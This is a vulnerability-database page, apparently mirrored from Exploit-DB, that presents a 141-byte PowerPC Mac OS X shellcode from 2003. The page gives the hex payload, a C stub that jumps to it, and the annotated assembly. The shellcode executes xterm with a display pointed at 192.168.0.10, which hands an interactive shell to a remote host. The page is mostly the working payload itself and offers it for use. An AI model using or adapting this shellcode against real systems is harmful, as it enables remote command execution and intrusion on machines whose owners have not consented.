OSX/PPC – execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)

OSX/PPC – execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)

漏洞ID 1054642 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-OSX/PPC – execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)-安全小百科CVE编号 N/A
图片[2]-OSX/PPC – execve(/usr/X11R6/bin/xterm) Shellcode (141 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 OSX_PPC CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13487
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
PPC OSX/Darwin Shellcode by B-r00t. 2003.
Does execve(/usr/X11R6/bin/xterm -display 192.168.0.10:0) exit(0);
See ASM below.
141 Bytes.
*/

char shellcode[] =
"x7cxa5x2ax79x40x82xffxfd"
"x7fxe8x02xa6x39x5fx01x70"
"x39x0axfexfcx7cxa8x29xae"
"x39x0axffx05x7cxa8x29xae"
"x39x0axffx14x7cxa8x29xae"
"x38x6axffx06x90x61xffxf8"
"x38x6axfexfdx90x61xffxf4"
"x38x6axfexe8x90x61xffxf0"
"x90xa1xffxfcx38x81xffxf0"
"x3bxc0x01x70x38x1exfexcb"
"x44xffxffx02x7cxa3x2bx78"
"x38x1exfex91x44xffxffx02"
"x2fx75x73x72x2fx58x31x31"
"x52x36x2fx62x69x6ex2fx78"
"x74x65x72x6dx2ax2dx64x69"
"x73x70x6cx61x79x2ax31x39"
"x32x2ex31x36x38x2ex30x2e"
"x31x30x3ax30x2a";

int main (void) 
{
        __asm__("b _shellcode");
}


/*
; PPC OS X / Darwin Shellcode by B-r00t.
; execve(/usr/X11R6/bin/xterm -display 192.168.0.10:0) exit(0) 
;
.globl _main
.text
_main:
        xor.    r5, r5, r5
        bnel    _main                    
        mflr    r31                       
        addi	r10, r31, 368
	addi    r8, r10, -260
        stbx    r5, r8, r5      
	addi    r8, r10, -251
        stbx    r5, r8, r5
	addi    r8, r10, -236
        stbx    r5, r8, r5
	addi    r3, r10, -250
        stw     r3, -8(r1)
	addi    r3, r10, -259
        stw     r3, -12(r1)
	addi    r3, r10, -280          
        stw     r3, -16(r1)      
        stw     r5, -4(r1)      
        subi    r4, r1, 16       
        li      r30, 368             
        addi    r0, r30, -309   
        .long   0x44ffff02      
        mr      r3, r5                  
        addi    r0, r30, -367   
        .long   0x44ffff02
path:   .asciz  "/usr/X11R6/bin/xterm*-display*192.168.0.10:0*"

*/

// milw0rm.com [2004-09-26]

相关推荐: FreeBSD catopen函数漏洞

FreeBSD catopen函数漏洞 漏洞ID 1206185 漏洞类型 未知 发布时间 2000-12-11 更新时间 2000-12-11 CVE编号 CVE-2000-1012 CNNVD-ID CNNVD-200012-049 漏洞平台 N/A CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享